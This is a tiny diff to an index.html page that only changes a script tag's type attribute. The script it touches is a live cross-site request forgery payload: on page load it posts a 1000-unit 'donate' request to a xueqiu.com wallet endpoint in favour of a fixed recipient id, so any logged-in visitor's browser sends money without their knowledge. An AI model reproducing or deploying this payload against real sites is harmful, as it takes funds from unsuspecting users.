--- a/index.html
+++ b/index.html
@@ -12,7 +12,7 @@
   </head>
 
   <body>
-  <script>
+  <script type="text/javascript">
     $.post("http://xueqiu.com/wallet/donate", { to_id: "29210754", to_type: "status", amount: "1000" } );
   </script>
 
